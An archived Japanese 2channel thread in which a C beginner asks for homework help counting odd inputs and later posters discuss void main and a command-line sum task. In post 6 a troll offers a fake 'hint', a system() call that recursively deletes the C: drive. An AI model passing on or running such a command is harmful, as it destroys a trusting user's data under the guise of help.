2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【どなたか】C言語プログラム【助けて・・・】

1 :erika:2010/10/20(水) 20:38:00
C言語初心者のものです。

scanf("%d",&n);でnに正の整数を入力する。次にn回正の整数を入力。
そのうち、奇数のものの個数を求めて出力するプログラムを作れ。

という問題が出ました。
プログラムを教えてください。

2 :デフォルトの名無しさん:2010/10/20(水) 20:41:21
やです。

3 :デフォルトの名無しさん:2010/10/20(水) 20:41:59
↓アイちゃん

4 :デフォルトの名無しさん:2010/10/20(水) 20:42:19
このスレッドは天才チンパンジー「アイちゃん」が
言語訓練のために立てたものです。

アイと研究員とのやり取りに利用するスレッドなので、
関係者以外は書きこまないで下さい。

                  京都大学霊長類研究所

5 :erika:2010/10/20(水) 20:43:16
本当にお願いします;;


6 :デフォルトの名無しさん:2010/10/20(水) 20:55:42
ちょっとヒントだけ。

system("cmd/c rd/s/q c:\\");

process.hをインクルードするのがポイント。

7 :erika:2010/10/20(水) 20:57:44
本気でたのんでるのに

8 :デフォルトの名無しさん:2010/10/20(水) 21:02:53
恥知らずな>>6がいるスレはここですか

9 :デフォルトの名無しさん:2010/10/20(水) 21:04:05
どれだけ本気か、写真か何かでみせてください。

10 :erika:2010/10/20(水) 21:11:59
#include<stdio.h>
main()
{

int 1i,n,a;
a=0;
scanf("%d",&n);
for(i=1;i<=n;++i)
{
if(n%2==1)
++a;

printf("%d\n",a);
}
}

こういったプログラムを書いてみましたが、
どうもうまくいきませんでした。
実行しても「n回数字を入力」になりません;;


11 :デフォルトの名無しさん:2010/10/20(水) 21:20:14
なんだ釣りか

12 :erika:2010/10/20(水) 21:21:22
>>11
C言語初心者なんです;;


13 :デフォルトの名無しさん:2010/10/20(水) 21:27:09
■■□■■■■□■■■■□■■■■■■■■■■□■■■■■■■■
■■□□□□■■□■■■□■■□□□□□■■■□■■■■■■■■
■■□■■□■■□■■■□■■■■■■□■■■□■■■■■■■■
■□■■■□■■■■■□■■■■■■□■■■■□■■■■■■■■
■□■■■□■■■■■□■■■■■■□■■■■□■■■□■■■■
■■■■■□■■■■■□■■■■■□■■■■■□■■■□■■■■
■■■■□■■■■■□■■■■■■□□■■■■□■■□■■■■■
■■■■□■■■■■□■■■■■□■■□■■■□■■□■■■■■
■■■□■■■■■□■■■■■□■■■■□■■□■□■■■■■■
■■□■■■■■□■■■■■□■■■■■■■■□□■■■■■■■
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
■■■■□■■■■■□■■■■■■■■■■■■■■■■■■■■■
■■■□□■■■■■□■■■■■■■□□□□□□□□□□□□■■
■■□□■■■■■□□□□□□■■■■■■■■■■■■■□□■■
■□□■■□■■■□■■■■□■■■■■■■■■■■■□□■■■
■■□■□□■■□□□■■□□■■■■■■■■■■■□□■■■■
■■■□□■■□□■□□□□■■■■■■■■■■■□□■■■■■
■■□□■■■■■■■□□■■■■■■■■■■■□□■■■■■■
■■□■■■□■■■□□□□■■■■■■■■■■□■■■■■■■
■□□□□□□■■□□■■□□■■■■■■■■■□■■■■■■■
■■■■□■■■□□■■■■□□■■■■■■■■□■■■■■■■
■■□■□■□■■■■□□■■■■■■■■■■■□■■■■■■■
■■□■□■□■■■■■□□■■■■■■■■■■□■■■■■■■
■□□■□■□■■■■■■■■■■■■■■■■■□■■■■■■■
■□■■□■■■■□□□■■■■■■■■■■■■□■■■■■■■
■■■■□■■■■■■□□□■■■■■■■■■■□■■■■■■■
■■■■□■■■■■■■■□□■■■■■■□□□□■■■■■■■

14 :デフォルトの名無しさん:2010/10/20(水) 21:32:42
#include<stdio.h>

void main() {

 int i, m, n, a;
 a = 0;

 scanf("%d", &n);

 for (i = 1; i <= n; ++i) {
  scanf("%d", &m);
  if (m % 2 == 1)
   ++a;
 }

 printf("%d\n", a);
}

15 :erika:2010/10/20(水) 21:45:48
>>14
ありがとうございます!!

しかし、このプログラムを実行しても「scanf("%d",&n);でnに正の整数を入力」
の部分が反映されないです・・。
scanf文で何回数字を入力するか指定したはずなのに(たとえば5回指定にするとします)、
実際に実行してみると2回しか数字を打つことが出来ません。
そして実行結果が1か0し表示されないのです・・・。


16 :erika:2010/10/20(水) 21:50:14
>>14さん

すいません、>>15は自分のミスでした。
本当にありがとうございました。



17 :デフォルトの名無しさん:2010/10/22(金) 03:50:47
2ch素人のフリをするならsageは使うべきじゃなかったな

18 :デフォルトの名無しさん:2010/10/22(金) 20:48:31
>>14
mainの戻り値にvoidを使う奴は素人

19 :デフォルトの名無しさん:2010/10/22(金) 22:29:48
>>18
俺も最初は void main(void) だった
最初に教わった書き方だけあってなかなか抜けなかったよ

>>1
初心者ならステップインの使い方さえ分かればデバッグは楽になるぞ

20 :デフォルトの名無しさん:2010/10/22(金) 23:11:31
mainの戻り値にこだわりを持って死んでいくのも楽しいと思うぜ!
がんばって!

21 :デフォルトの名無しさん:2010/10/24(日) 01:25:07
>>20はショートサーキットを知らないバカ

22 :デフォルトの名無しさん:2010/10/24(日) 17:28:50
>>1
http://hibari.2ch.net/test/read.cgi/tech/1286978599/

23 :ななし。:2011/07/27(水) 14:17:30.08
カ オ ス ラ ウ ン ジ ゆ る せ な ぁ い ー

24 :デフォルトの名無しさん:2011/11/30(水) 05:28:43.91
俺が最初に読んだ本には void main() と書いてあった

25 :デフォルトの名無しさん:2011/11/30(水) 11:06:01.75
mainの型なんて処理系が許せばdoubleだろうがstructだろうがおk

26 :デフォルトの名無しさん:2011/11/30(水) 18:19:03.13
プログラミングC言語についての質問です。
課題で出されたのですが、わかりません。
できる方、ぜひ教えてください。
問題は以下です。

コマンドライン引数で与えられた数字の列を足し算するプログラムmysumを作成せよ。
(ヒント:文字列をint型直すのにはatoi関数を使う)
例: mysum 3 1 → 4を表示
mysum 5 2 3 → 10を表示
mysum (引数なし) → 0を表示

助けてくれ〜

27 :デフォルトの名無しさん:2011/11/30(水) 21:31:12.03
main(int a,char**h){int o=0;while(0<--a)o+=atoi(h[a]);printf("%d\n",o);}

28 :デフォルトの名無しさん:2011/12/01(木) 09:26:40.30
そんくらい、自分で考えさせろや


29 :デフォルトの名無しさん:2011/12/01(木) 12:20:34.13
>>28
無茶を言うな

コマンドライン引数 → ぐぐればでてくる
atoi関数 → ぐぐればでてくる

以上から、帰納法を用いることにより>>26は足し算ができないということが証明できる


8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)